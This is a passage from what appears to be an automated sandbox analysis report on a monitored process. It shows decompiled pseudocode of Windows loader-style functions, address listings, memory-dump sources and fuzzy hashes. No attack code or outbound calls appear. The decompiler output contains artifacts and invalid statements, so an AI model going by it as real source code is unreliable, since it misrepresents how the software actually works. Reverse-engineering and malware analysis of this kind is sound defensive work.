						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0310D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E030E2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L030E4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0310F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E030DFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x31bb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0310B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                                                                                                                    0x030f5142
                                                                                                                                                    0x030f514c
                                                                                                                                                    0x030f5150
                                                                                                                                                    0x030f5157
                                                                                                                                                    0x030f5159
                                                                                                                                                    0x030f515e
                                                                                                                                                    0x030f5165
                                                                                                                                                    0x030f5169
                                                                                                                                                    0x030f516c
                                                                                                                                                    0x030f5172
                                                                                                                                                    0x030f5176
                                                                                                                                                    0x030f517a
                                                                                                                                                    0x030f517a
                                                                                                                                                    0x030f517a
                                                                                                                                                    0x030f517f
                                                                                                                                                    0x03136d8b
                                                                                                                                                    0x03136d8e
                                                                                                                                                    0x03136d91
                                                                                                                                                    0x03136d95
                                                                                                                                                    0x03136d98
                                                                                                                                                    0x03136d9c
                                                                                                                                                    0x03136da0
                                                                                                                                                    0x03136da3
                                                                                                                                                    0x03136da7
                                                                                                                                                    0x03136e26
                                                                                                                                                    0x03136e26
                                                                                                                                                    0x03136e2a
                                                                                                                                                    0x030f51f9
                                                                                                                                                    0x030f51f9
                                                                                                                                                    0x030f51fe
                                                                                                                                                    0x03136e33
                                                                                                                                                    0x03136e33
                                                                                                                                                    0x03136e39
                                                                                                                                                    0x03136e3d
                                                                                                                                                    0x03136e46
                                                                                                                                                    0x03136e50
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03136e52
                                                                                                                                                    0x03136e53
                                                                                                                                                    0x03136e56
                                                                                                                                                    0x03136e5d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03136e5f
                                                                                                                                                    0x03136e67
                                                                                                                                                    0x03136e77
                                                                                                                                                    0x03136e7f
                                                                                                                                                    0x03136e80
                                                                                                                                                    0x03136e88
                                                                                                                                                    0x03136e90
                                                                                                                                                    0x03136e9f
                                                                                                                                                    0x03136ea5
                                                                                                                                                    0x03136ea9
                                                                                                                                                    0x03136eb1
                                                                                                                                                    0x03136ebf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03136ecf
                                                                                                                                                    0x03136ed3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03136edb
                                                                                                                                                    0x03136ede
                                                                                                                                                    0x03136ee1
                                                                                                                                                    0x03136ee8
                                                                                                                                                    0x03136eeb
                                                                                                                                                    0x03136eed
                                                                                                                                                    0x03136ef0
                                                                                                                                                    0x03136ef4
                                                                                                                                                    0x03136ef8
                                                                                                                                                    0x03136efc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03136f0d
                                                                                                                                                    0x03136f11
                                                                                                                                                    0x03136f32
                                                                                                                                                    0x03136f37
                                                                                                                                                    0x03136f3b
                                                                                                                                                    0x03136f3e
                                                                                                                                                    0x03136f41
                                                                                                                                                    0x03136f46
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03136f4c
                                                                                                                                                    0x03136f50
                                                                                                                                                    0x03136f50
                                                                                                                                                    0x03136f54
                                                                                                                                                    0x03136f62
                                                                                                                                                    0x03136f65
                                                                                                                                                    0x03136f6d
                                                                                                                                                    0x03136f7b
                                                                                                                                                    0x03136f7b
                                                                                                                                                    0x03136f93
                                                                                                                                                    0x03136f98
                                                                                                                                                    0x03136fa0
                                                                                                                                                    0x03136fa6
                                                                                                                                                    0x03136fb3
                                                                                                                                                    0x03136fb6
                                                                                                                                                    0x03136fbf
                                                                                                                                                    0x03136fc1
                                                                                                                                                    0x03136fd5
                                                                                                                                                    0x03136fda
                                                                                                                                                    0x03136fda
                                                                                                                                                    0x03136fdd
                                                                                                                                                    0x03136fe2
                                                                                                                                                    0x03136fe7
                                                                                                                                                    0x03136feb
                                                                                                                                                    0x03136fef
                                                                                                                                                    0x03136ff3
                                                                                                                                                    0x030f520c
                                                                                                                                                    0x030f520c
                                                                                                                                                    0x030f520f
                                                                                                                                                    0x030f5215
                                                                                                                                                    0x030f5234
                                                                                                                                                    0x030f523a
                                                                                                                                                    0x030f523a
                                                                                                                                                    0x030f5244
                                                                                                                                                    0x030f5245
                                                                                                                                                    0x030f5246
                                                                                                                                                    0x030f5251
                                                                                                                                                    0x030f5251
                                                                                                                                                    0x03136f13
                                                                                                                                                    0x03136f17
                                                                                                                                                    0x03136f17
                                                                                                                                                    0x03136f18
                                                                                                                                                    0x03136f1b
                                                                                                                                                    0x03136f1f
                                                                                                                                                    0x03136f23
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03136f28
                                                                                                                                                    0x030f5204
                                                                                                                                                    0x030f5204
                                                                                                                                                    0x030f5208
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f5208
                                                                                                                                                    0x030f5185
                                                                                                                                                    0x030f5188
                                                                                                                                                    0x030f518a
                                                                                                                                                    0x030f518e
                                                                                                                                                    0x030f5195
                                                                                                                                                    0x03136db1
                                                                                                                                                    0x03136db5
                                                                                                                                                    0x03136db9
                                                                                                                                                    0x030f519b
                                                                                                                                                    0x030f519b
                                                                                                                                                    0x030f519e
                                                                                                                                                    0x030f51a7
                                                                                                                                                    0x030f51a9
                                                                                                                                                    0x030f51a9
                                                                                                                                                    0x030f51b5
                                                                                                                                                    0x030f51b8
                                                                                                                                                    0x030f51bb
                                                                                                                                                    0x030f51be
                                                                                                                                                    0x030f51c1
                                                                                                                                                    0x030f51c5
                                                                                                                                                    0x030f51c9
                                                                                                                                                    0x030f51cd
                                                                                                                                                    0x030f51cd
                                                                                                                                                    0x030f51d8
                                                                                                                                                    0x030f51dc
                                                                                                                                                    0x030f51e0
                                                                                                                                                    0x03136dcc
                                                                                                                                                    0x03136dd0
                                                                                                                                                    0x03136dd5
                                                                                                                                                    0x03136ddd
                                                                                                                                                    0x03136de1
                                                                                                                                                    0x03136de1
                                                                                                                                                    0x03136de5
                                                                                                                                                    0x03136deb
                                                                                                                                                    0x03136df1
                                                                                                                                                    0x03136df7
                                                                                                                                                    0x03136dfd
                                                                                                                                                    0x03136e01
                                                                                                                                                    0x03136e05
                                                                                                                                                    0x03136e09
                                                                                                                                                    0x03136e0d
                                                                                                                                                    0x03136e11
                                                                                                                                                    0x03136e11
                                                                                                                                                    0x030f51eb
                                                                                                                                                    0x03136e1a
                                                                                                                                                    0x03136e1f
                                                                                                                                                    0x03136e21
                                                                                                                                                    0x03136e23
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f51f1
                                                                                                                                                    0x030f51f1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f51f1

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6ab7baa011347656f2e4963e87f57ce2d9415c1c18612d0fdea81d6ae3333329
                                                                                                                                                    • Instruction ID: dfef0699a5bb59b8d1168b1cef423880cd6bd7cfedce1657cbcc3c4fcb3798bc
                                                                                                                                                    • Opcode Fuzzy Hash: 6ab7baa011347656f2e4963e87f57ce2d9415c1c18612d0fdea81d6ae3333329
                                                                                                                                                    • Instruction Fuzzy Hash: B9C134755093809FD354CF28C880A6AFBF1BF89304F184A6EF9998B392D771E845CB42
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030F03E2, Relevance: .3, Instructions: 254COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                    			E030F03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x31bd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E030F0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0310B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E030DB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x31b7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E030E7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E030E7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E03147016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E03109830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E031469A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x31b7c04 != 0) {
						_t118 = _v12;
						_t120 = E0314A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x31b7bd8;
						if( *0x31b7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E031095D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E031099A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E03143540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E030CB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0310AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x31b8474 - 3;
										if( *0x31b8474 != 3) {
											 *0x31b79dc =  *0x31b79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E030E7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E030E7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E03147016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x31b8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x31b7b00; // 0x0
							asm("ror esi, cl");
							 *0x31bb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E031095D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E030D7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                                                                                                                    0x030f03f1
                                                                                                                                                    0x030f03f7
                                                                                                                                                    0x030f03f9
                                                                                                                                                    0x030f03fb
                                                                                                                                                    0x030f03fd
                                                                                                                                                    0x030f0400
                                                                                                                                                    0x030f040a
                                                                                                                                                    0x03134c7a
                                                                                                                                                    0x030f0537
                                                                                                                                                    0x030f0547
                                                                                                                                                    0x030f0410
                                                                                                                                                    0x030f0410
                                                                                                                                                    0x030f0414
                                                                                                                                                    0x030f0417
                                                                                                                                                    0x030f041a
                                                                                                                                                    0x030f0421
                                                                                                                                                    0x030f0424
                                                                                                                                                    0x030f042b
                                                                                                                                                    0x030f043b
                                                                                                                                                    0x030f043e
                                                                                                                                                    0x030f043f
                                                                                                                                                    0x030f043f
                                                                                                                                                    0x030f0446
                                                                                                                                                    0x030f0449
                                                                                                                                                    0x030f044c
                                                                                                                                                    0x030f044f
                                                                                                                                                    0x030f0459
                                                                                                                                                    0x03134c8d
                                                                                                                                                    0x030f045f
                                                                                                                                                    0x030f045f
                                                                                                                                                    0x030f045f
                                                                                                                                                    0x030f0467
                                                                                                                                                    0x03134c97
                                                                                                                                                    0x03134c9d
                                                                                                                                                    0x03134ca4
                                                                                                                                                    0x03134caa
                                                                                                                                                    0x03134caf
                                                                                                                                                    0x03134cb1
                                                                                                                                                    0x03134cc3
                                                                                                                                                    0x03134cb3
                                                                                                                                                    0x03134cbc
                                                                                                                                                    0x03134cbc
                                                                                                                                                    0x03134cc8
                                                                                                                                                    0x03134ccb
                                                                                                                                                    0x03134cd7
                                                                                                                                                    0x03134cda
                                                                                                                                                    0x03134cdf
                                                                                                                                                    0x03134cdf
                                                                                                                                                    0x03134ccb
                                                                                                                                                    0x03134ca4
                                                                                                                                                    0x030f046d
                                                                                                                                                    0x030f046f
                                                                                                                                                    0x030f046f
                                                                                                                                                    0x030f0471
                                                                                                                                                    0x030f0476
                                                                                                                                                    0x030f047a
                                                                                                                                                    0x030f047b
                                                                                                                                                    0x030f0483
                                                                                                                                                    0x030f0489
                                                                                                                                                    0x030f048d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03134ce9
                                                                                                                                                    0x03134cef
                                                                                                                                                    0x03134d22
                                                                                                                                                    0x03134d22
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03134d22
                                                                                                                                                    0x03134cf1
                                                                                                                                                    0x03134cf7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03134cf9
                                                                                                                                                    0x03134cff
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03134d05
                                                                                                                                                    0x03134d07
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03134d0d
                                                                                                                                                    0x03134d0f
                                                                                                                                                    0x03134d14
                                                                                                                                                    0x03134d16
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03134d1c
                                                                                                                                                    0x03134d1c
                                                                                                                                                    0x030f0499
                                                                                                                                                    0x030f0535
                                                                                                                                                    0x030f0535
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f0535
                                                                                                                                                    0x030f04a6
                                                                                                                                                    0x03134d2c
                                                                                                                                                    0x03134d37
                                                                                                                                                    0x03134d39
                                                                                                                                                    0x03134d3b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03134d41
                                                                                                                                                    0x03134d48
                                                                                                                                                    0x030f0527
                                                                                                                                                    0x030f052b
                                                                                                                                                    0x030f052d
                                                                                                                                                    0x030f0530
                                                                                                                                                    0x030f0530
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f052b
                                                                                                                                                    0x03134d4e
                                                                                                                                                    0x030f04ac
                                                                                                                                                    0x030f04ac
                                                                                                                                                    0x030f04af
                                                                                                                                                    0x030f04b2
                                                                                                                                                    0x030f04b7
                                                                                                                                                    0x030f04b9
                                                                                                                                                    0x030f04bb
                                                                                                                                                    0x030f04bd
                                                                                                                                                    0x030f04bf
                                                                                                                                                    0x030f04c5
                                                                                                                                                    0x030f04c9
                                                                                                                                                    0x03134d53
                                                                                                                                                    0x03134d59
                                                                                                                                                    0x03134db9
                                                                                                                                                    0x03134dba
                                                                                                                                                    0x03134dbf
                                                                                                                                                    0x03134dc2
                                                                                                                                                    0x03134dc4
                                                                                                                                                    0x03134dc7
                                                                                                                                                    0x03134dce
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03134dce
                                                                                                                                                    0x03134d5b
                                                                                                                                                    0x03134d61
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03134d63
                                                                                                                                                    0x03134d69
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03134d6b
                                                                                                                                                    0x03134d6e
                                                                                                                                                    0x03134d74
                                                                                                                                                    0x03134d76
                                                                                                                                                    0x03134d7c
                                                                                                                                                    0x03134d7e
                                                                                                                                                    0x03134d84
                                                                                                                                                    0x03134d89
                                                                                                                                                    0x03134d8c
                                                                                                                                                    0x03134d8d
                                                                                                                                                    0x03134d92
                                                                                                                                                    0x03134d95
                                                                                                                                                    0x03134d96
                                                                                                                                                    0x03134d98
                                                                                                                                                    0x03134d9a
                                                                                                                                                    0x03134d9f
                                                                                                                                                    0x03134da4
                                                                                                                                                    0x03134da6
                                                                                                                                                    0x03134da8
                                                                                                                                                    0x03134daf
                                                                                                                                                    0x03134db1
                                                                                                                                                    0x03134db1
                                                                                                                                                    0x03134daf
                                                                                                                                                    0x03134da6
                                                                                                                                                    0x03134d84
                                                                                                                                                    0x03134d7c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03134d74
                                                                                                                                                    0x030f04d6
                                                                                                                                                    0x03134de1
                                                                                                                                                    0x030f04dc
                                                                                                                                                    0x030f04dc
                                                                                                                                                    0x030f04dc
                                                                                                                                                    0x030f04e4
                                                                                                                                                    0x03134deb
                                                                                                                                                    0x03134df1
                                                                                                                                                    0x03134df8
                                                                                                                                                    0x03134dfe
                                                                                                                                                    0x03134e03
                                                                                                                                                    0x03134e05
                                                                                                                                                    0x03134e17
                                                                                                                                                    0x03134e07
                                                                                                                                                    0x03134e10
                                                                                                                                                    0x03134e10
                                                                                                                                                    0x03134e1c
                                                                                                                                                    0x03134e1f
                                                                                                                                                    0x03134e35
                                                                                                                                                    0x03134e35
                                                                                                                                                    0x03134e1f
                                                                                                                                                    0x03134df8
                                                                                                                                                    0x030f04f1
                                                                                                                                                    0x030f04fa
                                                                                                                                                    0x03134e3f
                                                                                                                                                    0x03134e47
                                                                                                                                                    0x03134e5b
                                                                                                                                                    0x03134e61
                                                                                                                                                    0x03134e67
                                                                                                                                                    0x03134e69
                                                                                                                                                    0x03134e71
                                                                                                                                                    0x03134e73
                                                                                                                                                    0x030f0500
                                                                                                                                                    0x030f0500
                                                                                                                                                    0x030f0500
                                                                                                                                                    0x030f04fa
                                                                                                                                                    0x030f0508
                                                                                                                                                    0x030f051d
                                                                                                                                                    0x030f051d
                                                                                                                                                    0x030f051f
                                                                                                                                                    0x030f0524
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f0524
                                                                                                                                                    0x030f0515
                                                                                                                                                    0x030f0517
                                                                                                                                                    0x03134e7a
                                                                                                                                                    0x03134e7c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03134e85
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03134e85
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f0517

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: bcdc6e3f93d4612f2cfc5acc674fe2f60d2aeea2f0b5e6aef188ad2d21bac3ab
                                                                                                                                                    • Instruction ID: 8743b0e649191c8e82a875c285246f76fb39a01b202b4a5006e8ee24f2b32f03
                                                                                                                                                    • Opcode Fuzzy Hash: bcdc6e3f93d4612f2cfc5acc674fe2f60d2aeea2f0b5e6aef188ad2d21bac3ab
                                                                                                                                                    • Instruction Fuzzy Hash: 21913771E017149FDF31DB69CC44BBEBBA4AF0AB24F0A0261EA11AB6D1DB749C40C791
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030CC600, Relevance: .2, Instructions: 225COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                                    			E030CC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x31bd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E030D6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0310B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x31b7b9c; // 0x0
					_t74 = L030E4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E03109650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
